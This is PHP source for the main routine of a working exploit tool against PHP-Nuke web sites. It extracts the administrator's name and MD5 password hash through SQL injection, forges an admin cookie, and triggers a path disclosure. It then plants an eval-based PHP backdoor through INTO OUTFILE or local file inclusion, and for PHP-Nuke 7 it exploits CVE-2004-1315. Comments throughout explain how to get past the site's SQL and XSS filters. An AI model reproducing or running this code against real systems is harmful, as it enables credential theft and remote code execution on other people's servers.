function main()
{
$user_input = getopt("t:c:a:");
if ($user_input['t']) {
$attack_url = $user_input['t'];
if ($user_input['c']) {
$user_cookie = $user_input['c'];
}
//This is only useful for debugging, so its not listed in the useage.
if ($user_input['a']) {
$admin_cookie = $user_input['a'];
}
} else {
print "Useage: ./php_exploit -t http://localhost\n";
die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
$attack_url = str_replace("index.php", "", $attack_url);
$http = new http_client();
$sex = new php_nuke_blind_sql_injection($attack_url . "/");
if (!$admin_cookie) {
//This is what a cookie looks like:
//2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
//$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
if ($user_cookie) {
print "Using cookie...\n";
$http->cookie = $user_cookie;
//1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.
//This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.
$http->postdata = "title=wow\\&bodytext=/*&mood=" . urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
$response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
//This part of the exploit is a bit strange sorry for the mess, gotta realease!
if (strstr($response, "javascript:history.go(-1)")) {
//magic_quotes_gpc=on
$http->postdata = "title=wow&jbodytext=text&mood=" . urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
$response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
$http->postdata = '';
//Find the primary key of the journal entry we just created.
$jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid = explode("\">wow<", $jid);
$jid = explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
if (strpos($response, "31337")) {
list($junk, $aid, $pwd) = explode("31337 @ ", $response);
$aid = explode("<", $aid);
$pwd = explode("<", $pwd);
$user_name = $aid[0];
$pass_hash = $pwd[0];
} else {
//magic_quotes_gpc=off
sleep(3);
$http->postdata = "title=wow\\&jbodytext=/*&mood=1&status=" . urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1") . "&submit=Add+New+Entry";
$response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
sleep(2);
$jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
$jid = explode("\">wow<", $jid);
$jid = explode("jid=", $jid[0]);
$jid = explode("\">", $jid[1]);
//Check the journal for the admin's username/password hash
$response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[0]);
$inj = explode("Last updated on ", $response);
$inj = explode(" @ ", $inj[1]);
$pass_hash = $inj[0];
$inj = explode("<", $inj[1]);
$user_name = $inj[0];
}
} else {
$http->postdata = '';
//Find the primary key of the journal entry we just created.
$jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid = explode("\">wow',<", $jid);
$jid = explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
if (!strpos($response, "31337")) {
die("target has patched!\n");
} else {
print "Target vulnerable to a privilege escalation attack!!!\n";
list($junk, $aid, $pwd) = explode("31337 @ ", $response);
$aid = explode("<", $aid);
$pwd = explode("<", $pwd);
$user_name = $aid[0];
$pass_hash = $pwd[0];
}
}
} else {
$sex->sleep = "sleep(5)";
print "Starting Attack Against:" . $attack_url . "/\n";
print "Testing for blind sql injection...\n";
if (!$sex->test_target()) {
print "Target might be running 8.1.35\n";
print "Try the privilege esciation attack to upload the shell:";
die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
print "Target is vulnerable to blind sql injection!!!\n";
print "Please Standby For Attack...\n";
$pass_hash = $sex->find_md5("pwd");
$user_name = $sex->find_string("aid");
print "attacked used:" . $sex->request_count . " requests.\n";
}
print "Found Admin's name:" . $user_name . "\n";
print "Found MD5 Password hash:" . $pass_hash . "\n";
$admin_cookie = "admin=" . base64_encode($user_name . ":" . $pass_hash . ":") . ";";
}
print "Using Admin Session ID:\n" . $admin_cookie . "\n";
$http->cookie = $admin_cookie;
//ipban.php
sleep(3);
//This request will tell us what version of php-nuke it is.
//If it is 8, Then the page gives us configuration information to perserve.
$admin_options = $http->send($attack_url . "/admin.php?op=general");
if (!strstr($admin_options, "Content-Length: 0")) {
print "PHP-Nuke 8 detected.\n";
$option_values = explode("value='", $admin_options);
$x = 0;
array_shift($option_values);
//Parsing out and storing configuration values to restore them after the hack.
foreach ($option_values as $value) {
$value = explode("'", $value);
$values[] = urlencode($value[0]);
if ($x++ == 4) {
break;
}
}
//ipban.php
sleep(2);
//Enable error reporting
$http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
$error_reporting = $http->send($attack_url . "/admin.php");
//Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
$http->postdata = "add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
$remote_path = $http->getPath($attack_url . "/admin.php", 3);
sleep(2);
if (strstr($remote_path, ':\\')) {
print "Windows box detected.\n";
print "Remote path:{$remote_path}\n";
print "Uploading backdoor...\n";
$remote_path = addslashes(addslashes($remote_path . "\\frontend.php"));
$backdoor = 'get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '" . $remote_path . "'-- 1");
$re = $http->send($attack_url . "/admin.php?op=modifyUser");
//Disable error reporting
$http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
$error_reporting = $http->send($attack_url . "/admin.php");
} else {
print "*nix box detected.\n";
print "Remote path:{$remote_path}\n";
//Is mysql on the same machine as the httpd?
sleep(2);
$http->postdata = "chng_uid=" . urlencode("' or 1=(select if(substring(load_file('" . $remote_path . "/index.php'),1,1)='<',0,1))-- 1");
$mysql_check = $http->send($attack_url . "/admin.php?op=modifyUser");
if (strstr($mysql_check, "User Doesn't Exists!")) {
print "MySQL isn't on the same machine or you do not have file privileges.\n";
die("Remote code execution failed\n");
}
print "Uploading backdoor...\n";
//ipban.php
sleep(2);
//Grab the theme, this is needed to repair the database after the LFI
$theme = $http->send($attack_url . "/admin.php?op=themes");
$theme = explode('src="themes/', $theme);
$theme = explode('/images/', $theme[1]);
//Repair the database after the LFI.
$backdoor_installer = 'function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme=' . $sex->charEncode($theme[0]) . ', display_errors=0");';
//This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
$backdoor = 'get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
//Install the backdoor in a relitive directory.
$backdoor_installer .= 'file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php ' . $backdoor . '?".chr(62));';
//charEncode is used to bypass XSS filters.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
$http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor_installer . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
$http->send($attack_url . "/admin.php?op=modifyUser");
sleep(2);
//local file include vulnerablity to execute /tmp/theme.php
$http->postdata = "xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
$http->send($attack_url . "/admin.php");
sleep(2);
$http->postdata = '';
//Fire off a get request to trigger the uploaded php file using LFI
$http->send($attack_url);
sleep(2);
//Try the LFI again, just in case.
$http->send($attack_url . "/admin.php");
}
sleep(2);
//test if the backdoor works, try and clean up after the exploit.
$test_backdoor = $http->send($attack_url . "/frontend.php?e=" . urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
if (strstr($test_backdoor, "31337")) {
print "Remote Code execution tested successfully:\n" . $attack_url . "/frontend.php?e=phpinfo()" . urlencode(';') . "\n";
} else {
print "Backdoor install failed!\n";
}
} else {
////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
print "PHP-Nuke 7 detected.\n";
$http->postdata = "";
//send get requests.
//Fire off a check for CVE-2004-1315, phpbb maybe installed.
//This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
//php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
//to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
$try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
//if the exploit didn't work, then we might have to enable phpbb and populate it.
if (!strstr($try_exploit, "20041315")) {
//Enalbe PHPBB
$http->send($attack_url . "/admin.php?op=module_status&mid=22&active=1");
//create a new category for phpbb
$http->postdata = "mode=addcat&categoryname=test&addcategory=Create+new+category";
$t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php");
//ipban.php
sleep(2);
//create a new form in the new category
$http->postdata = "forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
$t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
$http->postdata = "forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
$http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
//create a new topic in the new form
$http->postdata = "username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
$http->send($attack_url . "/modules.php?name=Forums&file=posting");
//ipban.php
sleep(2);
//access the first topic.
$http->postdata = "";
//Check to see if any of the first 10 topics are exploitable.
for ($t = 1; $t < 10 && !strstr($try_exploit, "20041315"); $t++) {
//Fire off a check for CVE-2004-1315.
$try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . $t . "&highlight=%2527.printf%252820041315%2529.%2527");
}
}
//Check if we where able to hit CVE-2004-1315.
if (strstr($try_exploit, "20041315")) {
print "Remote Code execution tested successfully:\n" . $attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . --$t . "&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n";
} else {
print "Remote code execution has failed!\n";
}
}
}